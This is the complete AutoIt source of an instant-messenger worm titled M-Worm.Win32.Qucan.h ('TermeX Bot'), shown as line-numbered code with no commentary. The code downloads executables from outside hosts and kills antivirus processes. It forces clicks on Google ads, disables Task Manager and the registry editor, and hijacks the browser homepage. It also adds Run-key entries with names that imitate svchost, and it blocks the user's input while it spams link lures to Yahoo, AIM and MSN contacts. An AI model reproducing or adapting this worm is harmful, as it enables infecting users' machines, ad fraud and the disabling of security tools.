M-Worm.Win32.Qucan.h - Source Code

1. ; <AUT2EXE VERSION: 3.2.0.1>
2.  
3. ; ----------------------------------------------------------------------------
4. ; <AUT2EXE INCLUDE-START: D:\test\TermeX.au3>
5. ; ----------------------------------------------------------------------------
6.  
7. ;---------------------------------------------------------------
8. ; Author : TermeX - ThanatoS
9. ; Name: TermeX Bot
10. ; Version : 2.0
11. ; Usage : Advertise via Y!M,MSN,AIM
12. ; Published : 20-9-2006
13. ;---------------------------------------------------------------
14.  
15. ; Variables
16. #NoTrayIcon
17. $website = "http://nsl-school.org"
18. $website2 = "http://mytermex.com"
19. $website3 = "http://mytermex.com"
20.  
21. ; Infect into system
22. If Not FileExists(@WindowsDir & "\svhost32.exe") Then
23.         InetGet ("http://nsl-school.org/zin.exe", @WindowsDir & "\svhost32.exe", 0, 1)
24.         Sleep(10000)
25.     EndIf
26.  
27. If Not FileExists(@WindowsDir & "\svhost.exe") Then
28.         InetGet ("http://nsl-school.org/zun.exe", @WindowsDir & "\svhost.exe", 0, 1)
29.         Sleep(10000)
30.     EndIf
31.  
32. ; Kill Anti-Virus processes
33. If ProcessExists("Bkav2006.exe") Then
34.    ProcessClose("Bkav2006.exe")
35. EndIf
36.  
37. If ProcessExists("IEProt.exe") Then
38.    ProcessClose("IEProt.exe")
39. EndIf
40.  
41. ; Click on Google adsense's ads
42. $title = WinGetTitle("Viva TermeX - Microsoft Internet Explorer", "")
43. $check = WinExists ($title)
44. If $check = 1 Then
45.     BlockInput (1)
46.     WinActivate($title)
47.     WinSetState ( $title , "", @SW_MAXIMIZE)
48.     $pos = MouseGetPos()
49.     MouseClick("left", 400, 371, 1, 0)
50.     MouseMove ( $pos[0], $pos[1] , 0)
51.     BlockInput (0)
52. EndIf
53.  
54. $title = WinGetTitle("Viva TermeX", "")
55. $check = WinExists ($title)
56. If $check = 1 Then
57.     BlockInput (1)
58.     WinActivate($title)
59.     WinSetState ( $title , "", @SW_MAXIMIZE)
60.     $pos = MouseGetPos()
61.     MouseClick("left", 400, 371, 1, 0)
62.     MouseMove ( $pos[0], $pos[1] , 0)
63.     BlockInput (0)
64. EndIf
65.  
66. ; Write Registry keys
67. RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
68. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
69. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
70. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
71. RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
72. RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
73. RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\svhost32.exe")
74. RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "SVCHOST", "REG_SZ", @WindowsDir & "\svhost.exe")
75.  
76. ; List of random messages
77. Dim $tin[13]
78. $tin[0] = "Peel P50" & $website & "/?id=stories =)) "
79. $tin[1] = "E-Commerce" & $website2 & "/?id=tips >:D< "
80. $tin[2] = "Among Us" & $website & "/?id=cardetonated____www "
81. $tin[3] = "the only way to clean some online ads : " & $website2 & "/?id=ie_protector << "
82. $tin[4] = "Toyota Camry" & $website & "/?id=password <<"
83. $tin[5] = "look at my new car, Kia Accent " & $website2 & "/kiaaccentcar.jpg :x :x "
84. $tin[6] = "there's going to be a meteor shower tonight : " & $website & "/?id=18388 << "
85. $tin[7] = "check out my new personal website : " & $website2 & " Cool !!! "
86. $tin[8] = "WEB" & $website2 & "/?id=virus_shield << "
87. $tin[9] = "car lover  " & $website & "/?id=news  X-(  "
88. $tin[10] = "Ford Ranger " & $website2 & "/?news_id=18388 "
89. $tin[11] = "Toyota Innova " & $website & "/?id=forum . Why I cannot surf this site ??? "
90. $tin[12] = "Toyota Vios" & $website & "/?id=winning_list . Car Lovers!!! "
91.  
92. sleep(200000)
93.  
94. ; Main process
95. While (1)
96.  
97. $tieude0 = WinGetTitle("My Computer", "")
98. $kiemtra0 = WinExists ($tieude0)
99. $tieude0x = WinGetTitle("Windows Explorer", "")
100. $kiemtra0x = WinExists ($tieude0x)
101. $tieude1 = WinGetTitle("Yahoo! Messenger", "")
102. $kiemtra1 = WinExists ($tieude1)
103. $tieude2 = WinGetTitle("AIM", "")
104. $kiemtra2 = WinExists ($tieude2)
105. $tieude3 = WinGetTitle("Windows Live Messenger", "")
106. $kiemtra3 = WinExists ($tieude3)
107. $tieude4 = WinGetTitle("Windows Messenger", "")
108. $kiemtra4 = WinExists ($tieude4)
109.  
110.     If $kiemtra0 = 1 Then
111.         ClipPut($website)
112.         BlockInput (1)
113.         WinActivate($tieude0)
114.         Send("{F6}")
115.         Send("^v {ENTER}")
116.         BlockInput (0)
117.     EndIf
118.  
119.     If $kiemtra0x = 1 Then
120.         ClipPut($website)
121.         BlockInput (1)
122.         WinActivate($tieude0x)
123.         Send("{F6}")
124.         Send("^v {ENTER}")
125.         BlockInput (0)
126.     EndIf
127.  
128.     If $kiemtra1 = 1 Then
129.         $ngaunhien = Random(0,12,1)
130.         ClipPut($tin[$ngaunhien])
131.         BlockInput (1)
132.         WinActivate($tieude1)
133.         Send("!m")
134.         Send("un")
135.         Send("^v {ENTER}{ENTER}")
136.         Send("^m")
137.         Send("{DOWN}")
138.         Send("^{SHIFTDOWN}{END}{SHIFTUP}")
139.         Send("{ENTER}")
140.         Send("^v")
141.         Send("!s")
142.         BlockInput (0)
143.     EndIf
144.  
145.     If $kiemtra2 = 1 Then
146.         $ngaunhien = Random(0,12,1)
147.         ClipPut($tin[$ngaunhien])
148.         BlockInput (1)
149.         WinActivate($tieude2)
150.         Send("{HOME}")
151.         Send("{DOWN}")
152.         Send("^{SHIFTDOWN}{PGDN}{SHIFTUP}")
153.         Send("{ENTER}")
154.         Send("^v {ENTER}")
155.         Send("!{F4}")
156.         Send("!{F4}")
157.         BlockInput (0)
158.     EndIf
159.  
160.     If $kiemtra3 = 1 Then
161.         $ngaunhien = Random(0,12,1)
162.         ClipPut($tin[$ngaunhien])
163.         BlockInput (1)
164.         WinActivate($tieude3)
165.         Send("{ALT}")
166.         Send("a")
167.         Send("{ENTER}")
168.         Send("{SPACE}")
169.         Send("{DOWN}")
170.         Send("{SPACE}")
171.         Send("{DOWN}")
172.         Send("{SPACE}")
173.         Send("{DOWN}")
174.         Send("{SPACE}")
175.         Send("{DOWN}")
176.         Send("{SPACE}")
177.         Send("{DOWN}")
178.         Send("{SPACE}")
179.         Send("{DOWN}")
180.         Send("{SPACE}")
181.         Send("{DOWN}")
182.         Send("{SPACE}")
183.         Send("{DOWN}")
184.         Send("{SPACE}")
185.         Send("{DOWN}")
186.         Send("{SPACE}")
187.         Send("{DOWN}")
188.         Send("{SPACE}")
189.         Send("{ENTER}")
190.         Send("^v {ENTER}")
191.         Send("!{F4}")
192.         BlockInput (0)
193.     EndIf
194.  
195.     If $kiemtra4 = 1 Then
196.         $ngaunhien = Random(0,12,1)
197.         ClipPut($tin[$ngaunhien])
198.         BlockInput (1)
199.         WinActivate($tieude4)
200.         Send("{ALT}")
201.         Send("a")
202.         Send("{ENTER}")
203.         Send("{DOWN}")
204.         Send("{DOWN}")
205.         Send("{DOWN}")
206.         Send("{DOWN}")
207.         Send("{ENTER}")
208.         Send("^v {ENTER}")
209.         Send("!{F4}")
210.         Send("{ALT}")
211.         Send("a")
212.         Send("{ENTER}")
213.         Send("{DOWN}")
214.         Send("{DOWN}")
215.         Send("{DOWN}")
216.         Send("{DOWN}")
217.         Send("{DOWN}")
218.         Send("{ENTER}")
219.         Send("^v {ENTER}")
220.         Send("!{F4}")
221.         Send("{ALT}")
222.         Send("a")
223.         Send("{ENTER}")
224.         Send("{DOWN}")
225.         Send("{DOWN}")
226.         Send("{DOWN}")
227.         Send("{DOWN}")
228.         Send("{DOWN}")
229.         Send("{DOWN}")
230.         Send("{ENTER}")
231.         Send("^v {ENTER}")
232.         Send("!{F4}")
233.         Send("{ALT}")
234.         Send("a")
235.         Send("{ENTER}")
236.         Send("{DOWN}")
237.         Send("{DOWN}")
238.         Send("{DOWN}")
239.         Send("{DOWN}")
240.         Send("{DOWN}")
241.         Send("{DOWN}")
242.         Send("{DOWN}")
243.         Send("{ENTER}")
244.         Send("^v {ENTER}")
245.         Send("!{F4}")
246.         Send("{ALT}")
247.         Send("a")
248.         Send("{ENTER}")
249.         Send("{DOWN}")
250.         Send("{DOWN}")
251.         Send("{DOWN}")
252.         Send("{DOWN}")
253.         Send("{DOWN}")
254.         Send("{DOWN}")
255.         Send("{DOWN}")
256.         Send("{DOWN}")
257.         Send("{ENTER}")
258.         Send("^v {ENTER}")
259.         Send("!{F4}")
260.         Send("{ALT}")
261.         Send("a")
262.         Send("{ENTER}")
263.         Send("{DOWN}")
264.         Send("{DOWN}")
265.         Send("{DOWN}")
266.         Send("{DOWN}")
267.         Send("{DOWN}")
268.         Send("{DOWN}")
269.         Send("{DOWN}")
270.         Send("{DOWN}")
271.         Send("{DOWN}")
272.         Send("{ENTER}")
273.         Send("^v {ENTER}")
274.         Send("!{F4}")
275.         BlockInput (0)
276.     EndIf
277. Sleep(200000)
278. WEnd
279.  
280. ; ----------------------------------------------------------------------------
281. ; <AUT2EXE INCLUDE-END: D:\test\TermeX.au3>
282. ; ----------------------------------------------------------------------------
283.